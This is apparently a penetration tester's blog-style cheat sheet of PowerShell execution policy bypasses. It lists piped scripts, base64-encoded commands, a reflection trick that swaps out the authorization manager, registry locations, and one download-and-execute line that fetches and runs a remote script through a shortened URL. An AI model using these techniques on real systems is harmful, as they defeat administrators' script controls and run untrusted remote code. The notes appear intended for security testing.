---
layout: post
title: powershell exec policy bypasses
tags: pt
---

[awesumsauce](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/)

check:
```
Get-ExecutionPolicy
```

bypasses:
```
paste the frkin script into powershell
```
pipes
```
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
```
```
gc .\runme.ps1 | PowerShell.exe -noprofile -
```
```
type .\runme.ps1 | PowerShell.exe -noprofile -
```
```
gc .\runme.ps1 | iex
```
command flag
```
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
```
```
Powershell -c "Write-Host 'My voice is my passport, verify me.'"
```
encode
```
$command = "Write-Host 'My voice is my passport, verify me.'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 
powershell.exe -EncodedCommand $encodedCommand
```
```
powershell.exe -e VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
```
invoke-command / scriptblock
```
invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
```
```
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force
```
exec-policy
```
PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1
```
```
PowerShell.exe -ExecutionPolicy UnRestricted -File .\runme.ps1
```
[sign script, then run below](http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html)
```
PowerShell.exe -ExecutionPolicy Remote-signed -File .\runme.ps1
```
```
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}  Disable-ExecutionPolicy  .\runme.ps1
```
```
Set-ExecutionPolicy Bypass -Scope Process
```
```
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
```
set registry directly
```
HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
```
